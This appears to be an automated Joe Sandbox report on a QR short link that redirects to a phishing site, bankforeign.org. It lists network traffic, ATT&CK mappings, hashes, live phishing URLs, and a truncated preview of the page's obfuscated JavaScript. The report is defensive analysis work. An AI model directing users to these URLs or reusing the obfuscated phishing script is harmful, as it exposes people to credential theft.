          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: unknownHTTPS traffic detected: 23.36.68.63:443 -> 192.168.2.4:49742 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.36.68.63:443 -> 192.168.2.4:49747 version: TLS 1.2
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_BITS_6108_660003403Jump to behavior
          Source: classification engineClassification label: mal72.phis.troj.win@20/34@22/11
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2628 --field-trial-handle=2440,i,8409755720781432192,11699646399889136844,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "https://qrco.de/belJ9F
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2628 --field-trial-handle=2440,i,8409755720781432192,11699646399889136844,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
          Source: Window RecorderWindow detected: More than 3 window changes detected

          Data Obfuscation

          barindex
          Source: Yara matchFile source: 2.6.pages.csv, type: HTML
          Source: Yara matchFile source: 3.7.pages.csv, type: HTML
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
          Process Injection
          1
          Masquerading
          OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Process Injection
          LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
          Non-Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
          Ingress Tool Transfer
          Traffic DuplicationData Destruction
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1385181 URL: https://qrco.de/belJ9F Startdate: 01/02/2024 Architecture: WINDOWS Score: 72 26 Phishing site detected (based on shot match) 2->26 28 Yara detected Html Dropper 2->28 30 Yara detected HtmlPhish10 2->30 32 2 other signatures 2->32 6 chrome.exe 1 2->6         started        9 chrome.exe 2->9         started        process3 dnsIp4 14 192.168.2.16 unknown unknown 6->14 16 192.168.2.4, 138, 443, 49687 unknown unknown 6->16 18 239.255.255.250 unknown Reserved 6->18 11 chrome.exe 6->11         started        process5 dnsIp6 20 www.google.com 108.177.122.106, 443, 49741, 49795 GOOGLEUS United States 11->20 22 clients.l.google.com 172.217.215.139, 443, 49730 GOOGLEUS United States 11->22 24 7 other IPs or domains 11->24

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          https://qrco.de/belJ9F0%Avira URL Cloudsafe
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://bankforeign.org/ASSETS/img/m_.svg0%Avira URL Cloudsafe
          https://bankforeign.org/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=84ecff1778c367660%Avira URL Cloudsafe
          https://bankforeign.org/x/a8fa5b4494ce08322db1f933d9e75f5e65bc01571cb750%Avira URL Cloudsafe
          https://bankforeign.org/favicon.ico0%Avira URL Cloudsafe
          https://bankforeign.org/ASSETS/img/sig-op.svg0%Avira URL Cloudsafe
          https://bankforeign.org/boot/a8fa5b4494ce08322db1f933d9e75f5e65bc015265ade0%Avira URL Cloudsafe
          https://bankforeign.org/js/a8fa5b4494ce08322db1f933d9e75f5e65bc015265adf0%Avira URL Cloudsafe
          https://bankforeign.org/o/a8fa5b4494ce08322db1f933d9e75f5e65bc01571cb9d0%Avira URL Cloudsafe
          https://bankforeign.org/APP-a8fa5b4494ce08322db1f933d9e75f5e65bc01571cb6e/a8fa5b4494ce08322db1f933d9e75f5e65bc01571cb6f0%Avira URL Cloudsafe
          https://bankforeign.org/jq/a8fa5b4494ce08322db1f933d9e75f5e65bc015265adc0%Avira URL Cloudsafe
          https://bankforeign.org/10%Avira URL Cloudsafe
          https://bankforeign.org/cdn-cgi/challenge-platform/h/b/flow/ov1/461457:1706818037:TP9mi9T_s6X4VHjzA43SctCQXweCPTtEqjXfreTTO6Q/84ecff1778c36766/f5b0b7c7d91ebf90%Avira URL Cloudsafe

          Download Network PCAP: filteredfull

          NameIPActiveMaliciousAntivirus DetectionReputation
          a.nel.cloudflare.com
          35.190.80.1
          truefalse
            high
            accounts.google.com
            64.233.185.84
            truefalse
              high
              challenges.cloudflare.com
              104.17.2.184
              truefalse
                high
                www.google.com
                108.177.122.106
                truefalse
                  high
                  clients.l.google.com
                  172.217.215.139
                  truefalse
                    high
                    qrco.de
                    108.157.162.84
                    truefalse
                      unknown
                      bankforeign.org
                      104.21.73.88
                      truefalse
                        unknown
                        fp2e7a.wpc.phicdn.net
                        192.229.211.108
                        truefalse
                          unknown
                          clients2.google.com
                          unknown
                          unknownfalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1724395763:1706818044:48Oktt0s5MTU6dFdGgTX_IFhJzDfI-CAztyQWs6jl5M/84ecff284c9c7bd8/40a43fe0ff648d1false
                              high
                              https://bankforeign.org/o/a8fa5b4494ce08322db1f933d9e75f5e65bc01571cb9dfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://bankforeign.org/jq/a8fa5b4494ce08322db1f933d9e75f5e65bc015265adcfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://bankforeign.org/APP-a8fa5b4494ce08322db1f933d9e75f5e65bc01571cb6e/a8fa5b4494ce08322db1f933d9e75f5e65bc01571cb6ffalse
                              • Avira URL Cloud: safe
                              unknown
                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=84ecff284c9c7bd8false
                                high
                                https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standardfalse
                                  high
                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/84ecff284c9c7bd8/1706819895334/ZNRieHZtFjh53PUfalse
                                    high
                                    https://bankforeign.org/boot/a8fa5b4494ce08322db1f933d9e75f5e65bc015265adefalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://a.nel.cloudflare.com/report/v3?s=0S4PiP0gxocJhKQemQtsT797FCYuyJA0Lc5eZmR5DHkBAbV2hPmaVeY9qEqq9L3ty%2FbEUuwvg736Di0HPBf6U%2FMUaISYZglgHqzPpEiZbY2GOC5E9jkVOoKnjMTh2o0WiMY%3Dfalse
                                      high
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3Dfalse
                                        high
                                        https://bankforeign.org/js/a8fa5b4494ce08322db1f933d9e75f5e65bc015265adffalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://bankforeign.org/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=84ecff1778c36766false
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/84ecff284c9c7bd8/1706819895338/b81ae8d2fdf28c1e7dd5c58790b5061860f582aa9f45611c56e54c4cbacce485/lRi2J-abNJ11Sqgfalse
                                          high
                                          https://bankforeign.org/x/a8fa5b4494ce08322db1f933d9e75f5e65bc01571cb75false
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://qrco.de/belJ9Ffalse
                                            unknown
                                            https://bankforeign.org/true
                                              unknown
                                              https://bankforeign.org/favicon.icofalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://bankforeign.org/ASSETS/img/sig-op.svgfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1false
                                                high
                                                https://bankforeign.org/21663221c08095a4839b4833d7029a6265bc0151070e0LOG21663221c08095a4839b4833d7029a6265bc0151070e1#true
                                                  unknown
                                                  https://bankforeign.org/ASSETS/img/m_.svgfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://bankforeign.org/cdn-cgi/challenge-platform/h/b/flow/ov1/461457:1706818037:TP9mi9T_s6X4VHjzA43SctCQXweCPTtEqjXfreTTO6Q/84ecff1778c36766/f5b0b7c7d91ebf9false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://bankforeign.org/1false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://a.nel.cloudflare.com/report/v3?s=7QaMGIEc9gchFEUaQP5n9JG07%2FyeaYKGEWqRoQFbiogYlu%2F8ZyYw4BROHqmmyfIanPQU6hA37OWlNqEYfq2p0oC1fcBawYw%2FI%2FJyt4OtBBI1oF4mtb9%2Bw4o%2FogLyV2mVxCM%3Dfalse
                                                    high
                                                    https://bankforeign.org/21663221c08095a4839b4833d7029a6265bc0151070e0LOG21663221c08095a4839b4833d7029a6265bc0151070e1true
                                                      unknown
                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://getbootstrap.com/)chromecache_63.2.drfalse
                                                        high
                                                        https://github.com/twbs/bootstrap/graphs/contributors)chromecache_63.2.drfalse
                                                          high
                                                          https://github.com/twbs/bootstrap/blob/master/LICENSE)chromecache_63.2.drfalse
                                                            high
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            172.217.215.139
                                                            clients.l.google.comUnited States
                                                            15169GOOGLEUSfalse
                                                            104.17.3.184
                                                            unknownUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            108.157.162.84
                                                            qrco.deUnited States
                                                            16509AMAZON-02USfalse
                                                            108.177.122.106
                                                            www.google.comUnited States
                                                            15169GOOGLEUSfalse
                                                            239.255.255.250
                                                            unknownReserved
                                                            unknownunknownfalse
                                                            64.233.185.84
                                                            accounts.google.comUnited States
                                                            15169GOOGLEUSfalse
                                                            35.190.80.1
                                                            a.nel.cloudflare.comUnited States
                                                            15169GOOGLEUSfalse
                                                            104.17.2.184
                                                            challenges.cloudflare.comUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            104.21.73.88
                                                            bankforeign.orgUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            IP
                                                            192.168.2.16
                                                            192.168.2.4
                                                            Joe Sandbox version:39.0.0 Ruby
                                                            Analysis ID:1385181
                                                            Start date and time:2024-02-01 21:37:09 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 3m 35s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:browseurl.jbs
                                                            Sample URL:https://qrco.de/belJ9F
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:8
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal72.phis.troj.win@20/34@22/11
                                                            EGA Information:Failed
                                                            HCA Information:
                                                            • Successful, ratio: 100%
                                                            • Number of executed functions: 0
                                                            • Number of non-executed functions: 0
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 172.253.124.94, 34.104.35.123, 52.165.165.26, 72.21.81.240, 192.229.211.108, 20.166.126.56, 142.251.15.95, 172.253.124.95, 108.177.122.95, 74.125.136.95, 64.233.177.95, 172.217.215.95, 142.250.9.95, 74.125.138.95, 64.233.185.95, 142.250.105.95, 173.194.219.95, 64.233.176.95, 64.233.176.94
                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, content-autofill.googleapis.com, slscr.update.microsoft.com, wu.ec.azureedge.net, clientservices.googleapis.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                            • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                            • VT rate limit hit for: https://qrco.de/belJ9F
                                                            No simulations
                                                            No context
                                                            No context
                                                            No context
                                                            No context
                                                            No context
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                            Category:downloaded
                                                            Size (bytes):105369
                                                            Entropy (8bit):5.240719144154261
                                                            Encrypted:false
                                                            SSDEEP:1536:l+gu2w+EEnazA/PWrF7qvEAFiQcpmQoDZztVEHn8:E6CEVEH8
                                                            MD5:8E6B0F88563F9C33F78BCE65CF287DF7
                                                            SHA1:EF7765CD2A7D64ED27DD7344702597AFF6F8C397
                                                            SHA-256:A7057BEBFFF43E7281CA31DA00D40BD88C8D02D1576B9C45891DD56A3853269A
                                                            SHA-512:7DCE31D45ACA40340490B9F437A22ADF212B049DE0D4DDEB908A50C1F5C6C7B5561323B3A93B6ED3E5A7C44D7170460BFF8D8722749191C0F5A8DBD83E093E7F
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://bankforeign.org/APP-a8fa5b4494ce08322db1f933d9e75f5e65bc01571cb6e/a8fa5b4494ce08322db1f933d9e75f5e65bc01571cb6f
                                                            Preview:html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:bold}dfn{font-style:italic}h1{font-size:2em;margin:.67em 0}mark{background:#ff0;color:#000}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sup{top:-0.5em}sub{bottom:-0.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{-moz-box-sizing:content-box;box-sizing:content-box;height:0}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}button,input,optgroup,select,textarea{color:inherit;font:inherit;margin:0}button{overflow:visible}
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:downloaded
                                                            Size (bytes):16
                                                            Entropy (8bit):3.875
                                                            Encrypted:false
                                                            SSDEEP:3:HtHKiY:RKiY
                                                            MD5:011B17B116126E6E0C4A9B0DE9145805
                                                            SHA1:DF63A6EB731FFCE96F79802EFF6D53D00CDA42BC
                                                            SHA-256:3418E6E704387A99F1611EB7BB883328A438BA600971E6D692E8BEA60F10B179
                                                            SHA-512:BB432E96AF588E0B19CBD8BC228C87989FE578167FD1F3831C7E50D2D86DE11016FB93679FEF189B39085E9151EB9A6EB2986155C65DD0FE95EC85454D32AE7D
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAlW7ZI3LhmxWBIFDdFbUVI=?alt=proto
                                                            Preview:CgkKBw3RW1FSGgA=
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:HTML document, ASCII text, with very long lines (4020)
                                                            Category:downloaded
                                                            Size (bytes):4464
                                                            Entropy (8bit):5.57483014825436
                                                            Encrypted:false
                                                            SSDEEP:96:qLIkEaeIllHhD6UPYznjUC5PAv00cCv3m4oilpM:gIkTeI7h/YzjUC5Yv4phc6
                                                            MD5:48B410E448777D41DC68C92EDCAFA12A
                                                            SHA1:72D3C2E6F42E05472D294F16D805916AE63E4D8A
                                                            SHA-256:A46D9FDB999D0196C4FA7AEEDF51009A27B5569BD9C5A9FA72C9CDD02C22555A
                                                            SHA-512:7E1CEBB8CC9C50EAD33BF5749C88EEE74FACCD06E16BD9CF5B0239BCB4FB02D8492839ECEA596F6F92F67C0BF2D7535E215AB6FCD32D3205565DFA16FEEFADC9
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://bankforeign.org/21663221c08095a4839b4833d7029a6265bc0151070e0LOG21663221c08095a4839b4833d7029a6265bc0151070e1
                                                            Preview:<!DOCTYPE html>.<html>.<head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1">. <title></title>. <script src="jq/a8fa5b4494ce08322db1f933d9e75f5e65bc015265adc"></script>. <script src="boot/a8fa5b4494ce08322db1f933d9e75f5e65bc015265ade"></script>. <script src="js/a8fa5b4494ce08322db1f933d9e75f5e65bc015265adf"></script>.</head>..<script type="text/javascript">.function r(V,f){var e=I();return r=function(k,F){k=k-0x140;var G=e[k];return G;},r(V,f);}var A=r;(function(q,T){var K=r,S=q();while(!![]){try{var X=-parseInt(K('0x167'))/0x1*(parseInt(K(0x172))/0x2)+parseInt(K('0x148'))/0x3+parseInt(K(0x181))/0x4+-parseInt(K('0x15e'))/0x5+-parseInt(K('0x15f'))/0x6+parseInt(K('0x143'))/0x7+parseInt(K(0x15b))/0x8*(parseInt(K('0x180'))/0x9);if(X===T)break;else S['push'](S['shift']());}catch(y){S['push'](S['shift']());}}}(I,0x6def1));var G=(function(){var q=!![];return function(T,S){var X=q?function(){var t=r;if(S){var y=S[t('0x
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 37 x 80, 8-bit/color RGB, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):61
                                                            Entropy (8bit):4.035372245524404
                                                            Encrypted:false
                                                            SSDEEP:3:yionv//thPlAvtn/5khBxl/k4E08up:6v/lhPW6hB7Tp
                                                            MD5:6FC374CF1478B0AD63F7D3FB75CC3959
                                                            SHA1:D614A38519C11479C9BC1769163F54DE5C6AB72B
                                                            SHA-256:D360D570D243ED9C3FC8F403C23C217A9B16E20D337BD48AF376421A6141ABA0
                                                            SHA-512:F890D81A3B2DED82EEDE6457EB29F2C5B06D7B6C669DA673387040D41BB9D697AB4E47E86B24C142CAA6FAB8869F2B2314A0A5F75A617A7BB5F4997BDA284E70
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...%...P.......+&....IDAT.....$.....IEND.B`.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:SVG Scalable Vector Graphics image
                                                            Category:dropped
                                                            Size (bytes):3651
                                                            Entropy (8bit):4.094801914706141
                                                            Encrypted:false
                                                            SSDEEP:96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
                                                            MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                                                            SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                                                            SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                                                            SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:HTML document, ASCII text
                                                            Category:downloaded
                                                            Size (bytes):315
                                                            Entropy (8bit):5.0572271090563765
                                                            Encrypted:false
                                                            SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                            MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                            SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                            SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                            SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://bankforeign.org/favicon.ico
                                                            Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):61
                                                            Entropy (8bit):3.990210155325004
                                                            Encrypted:false
                                                            SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                            MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                            SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                            SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                            SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (32065)
                                                            Category:downloaded
                                                            Size (bytes):85578
                                                            Entropy (8bit):5.366055229017455
                                                            Encrypted:false
